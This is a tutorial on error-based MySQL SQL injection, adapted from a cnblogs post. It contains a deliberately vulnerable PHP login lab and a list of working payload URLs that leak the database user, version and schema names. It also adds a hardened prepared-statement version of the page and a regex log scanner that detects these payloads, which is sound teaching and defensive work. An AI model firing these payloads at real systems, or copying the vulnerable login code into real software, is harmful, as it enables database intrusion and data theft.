```sql
mysql> create database sqli;
mysql> create table user (
    id int(11) not null auto_increment primary key,
    name varchar(20) not null,
    pass varchar(32) not null
);
mysql> insert into user (name, pass) values ('admin', md5('admin888')), ('guest', md5('guest'));
```
```php
<?php
$conn = mysql_connect("localhost", "root", "root"); // connect to the database as root / root
if (!$conn) {
    die("Connection failed: " . mysql_error());
}
mysql_select_db("sqli", $conn);

// verify login info
if (isset($_GET['name']) && isset($_GET['pass'])) {
    $name = $_GET['name'];      // interpolated into the query below without escaping
    $pass = md5($_GET['pass']);
    $query = "select * from user where name='$name' and pass='$pass'";
    if ($result = mysql_query($query, $conn)) {
        $row = mysql_fetch_array($result, MYSQL_ASSOC);
        if ($row) {
            echo "<script>alert('login successful!');</script>";
        }
    } else {
        // the raw MySQL error text is echoed to the client; this is what every
        // error-based technique below relies on
        die("Operation error: " . mysql_error());
    }
}
mysql_close();
?>
<!DOCTYPE html>
<html>
<head>
    <title>Login</title>
</head>
<body>
<center>
    <form method="get" action="">
        <label>Username:</label><input type="text" name="name" value=""/><br/>
        <label>Password:</label><input type="password" name="pass" value=""/><br/>
        <input type="submit" value="login"/>
    </form>
</center>
</body>
</html>
```
The PHP login-verification code in index.php is very simple:
```php
$name = $_GET['name'];
$pass = md5($_GET['pass']);
$query = "select * from user where name='$name' and pass='$pass'";
```
The $name parameter is interpolated straight into the query string, so it is an obvious injection point.
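For contrast, here is a hardened version of the same login page. This is an added example, not code from the original post: it assumes the same `sqli` database and `user` table, with the `pass` column widened (for example to varchar(255)) so it can store password_hash() output, and a hypothetical least-privilege MySQL account `sqli_app` in place of root. The two changes that matter for this post are that the username is bound as a prepared-statement parameter instead of being pasted into the SQL text, and that driver errors are logged server-side rather than echoed to the client.

```php
<?php
declare(strict_types=1);

// Added example, not from the original post. Assumes the `sqli` database and
// `user` table above with a wider `pass` column, and a hypothetical
// least-privilege account `sqli_app` (password is a placeholder).
function connect(): PDO
{
    return new PDO(
        'mysql:host=localhost;dbname=sqli;charset=utf8mb4',
        'sqli_app',
        'change-me', // placeholder credential
        [
            PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
            PDO::ATTR_EMULATE_PREPARES   => false, // real server-side prepared statements
            PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
        ]
    );
}

function login(PDO $pdo, string $name, string $pass): bool
{
    // The user-supplied name never becomes part of the SQL text: it is bound as
    // a parameter, so quotes, comments and function calls inside it are just data.
    $stmt = $pdo->prepare('SELECT pass FROM user WHERE name = :name LIMIT 1');
    $stmt->execute([':name' => $name]);
    $row = $stmt->fetch();

    // Verify against a dummy hash when the user does not exist, so a missing
    // user and a wrong password take roughly the same time.
    static $dummy = null;
    $dummy = $dummy ?? password_hash('not-a-real-password', PASSWORD_DEFAULT);
    $stored = $row === false ? $dummy : (string) $row['pass'];
    $ok = password_verify($pass, $stored); // replaces the unsalted md5() comparison
    return $ok && $row !== false;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['name'], $_POST['pass'])) {
    try {
        $ok = login(connect(), (string) $_POST['name'], (string) $_POST['pass']);
        echo $ok ? 'login successful' : 'invalid username or password';
    } catch (PDOException $e) {
        // Never send the driver error to the client: that message is the oracle
        // every error-based technique below relies on. Log it server-side instead.
        error_log('login failed: ' . $e->getMessage());
        http_response_code(500);
        echo 'an internal error occurred';
    }
}
?>
<!DOCTYPE html>
<html>
<head>
    <title>Login</title>
</head>
<body>
<center>
    <form method="post" action="">
        <label>Username:</label><input type="text" name="name"/><br/>
        <label>Password:</label><input type="password" name="pass"/><br/>
        <input type="submit" value="login"/>
    </form>
</center>
</body>
</html>
```

The form is switched to POST so credentials no longer land in the access log as part of the URL. Existing md5() rows would have to be re-hashed with password_hash() (for instance on each user's next successful login), and in production `display_errors` should be off in php.ini so that an uncaught exception cannot leak the query either.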
1. Error via floor():
http://localhost/index.php?name='+or+(select+1+from(select+count(*),concat(user(),0x7e,floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+%23&pass=1
Dumping database names: replace the keyword with whatever you want to query:
http://localhost/index.php?name='+or+(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)+%23&pass=1
2. Error via extractvalue():
http://localhost/index.php?name='+or+extractvalue(1,concat(user(),0x7e,version()))+%23&pass=1
3. Error via updatexml():
http://localhost/index.php?name='+or+updatexml(1,concat(user(),0x7e,version()),1)+%23&pass=1
4. Error via exp(); for details see: https://osandamalith.wordpress.com/2015/07/15/error-based-sql-injection-using-exp/
http://localhost/index.php?name='+or+EXP(~(SELECT * from(select user())a))+%23&pass=1
5. Error via NAME_CONST() (works on older versions):
http://localhost/index.php?name='+or+(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)+%23&pass=1
6. Error via multipoint(), multipolygon(), multilinestring(), linestring(), GeometryCollection(), polygon() and similar functions:
http://localhost/index.php?name='+or+multipoint((select * from(select * from(select user())a)b))+%23&pass=1
http://localhost/index.php?name='+or+multipolygon((select * from(select * from(select database())a)b))+%23&pass=1
http://localhost/index.php?name='+or+multilinestring((select * from(select * from(select user())a)b))+%23&pass=1
http://localhost/index.php?name='+or+LINESTRING((select * from(select * from(select user())a)b))+%23&pass=1
http://localhost/index.php?name='+or+GeometryCollection((select * from(select * from(select user())a)b))+%23&pass=1
http://localhost/index.php?name='+or+polygon((select * from(select * from(select user())a)b))+%23&pass=1
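All six techniques share a small set of function names that a normal login request never contains, which makes them easy to spot in the web server's access log. The following PHP scanner is an added example, not part of the original post: it decodes the request URL from Apache combined-log lines (the three sample lines are constructed) and reports which of the above error-based patterns each one matches. The signature names are my own labels.

```php
<?php
declare(strict_types=1);

// Added example, not from the original post: match the error-based MySQL
// function calls used in the payloads above against decoded request URLs.
const ERROR_BASED_SIGNATURES = [
    'floor_rand_groupby' => '/floor\s*\(\s*rand\s*\(.*\bgroup\s+by\b/is',
    'extractvalue'       => '/\bextractvalue\s*\(/i',
    'updatexml'          => '/\bupdatexml\s*\(/i',
    'exp_overflow'       => '/\bexp\s*\(\s*~/i',
    'name_const'         => '/\bname_const\s*\(/i',
    'geometry_function'  => '/\b(multipoint|multipolygon|multilinestring|linestring|geometrycollection|polygon)\s*\(\s*\(?\s*select\b/i',
];

/** Pull the request target out of a combined-log line and decode it as PHP would. */
function decodedRequest(string $line): ?string
{
    if (!preg_match('/"(?:GET|POST) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return null;
    }
    // Decode twice so that double-encoded payloads (%2527 and friends) are not missed.
    return urldecode(urldecode($m[1]));
}

/** Names of the signatures that match one log line; an empty array means nothing suspicious. */
function classifyLine(string $line): array
{
    $req = decodedRequest($line);
    if ($req === null) {
        return [];
    }
    $hits = [];
    foreach (ERROR_BASED_SIGNATURES as $name => $re) {
        if (preg_match($re, $req) === 1) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Constructed sample lines: one benign login, one extractvalue probe, one floor()/rand() probe.
$sampleLog = [
    '10.0.0.5 - - [01/May/2016:10:00:00 +0800] "GET /index.php?name=guest&pass=guest HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/May/2016:10:00:07 +0800] "GET /index.php?name=%27+or+extractvalue(1,concat(user(),0x7e,version()))+%23&pass=1 HTTP/1.1" 500 231',
    '10.0.0.9 - - [01/May/2016:10:00:12 +0800] "GET /index.php?name=%27+or+(select+1+from(select+count(*),concat(user(),0x7e,floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+%23&pass=1 HTTP/1.1" 500 240',
];

foreach ($sampleLog as $line) {
    $hits = classifyLine($line);
    printf("%-6s %s\n", $hits ? 'ALERT' : 'ok', $hits ? implode(',', $hits) : substr($line, 0, 40));
}
```

Run it with `php scan.php` (or feed real lines with `fgets()` on the log file in place of `$sampleLog`). A 500 status next to one of these matches, as in the two constructed alert lines, is the combination to page on: it means the application is still surfacing the database error that the technique depends on.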
Original article: http://www.cnblogs.com/tyomcat/p/5410816.html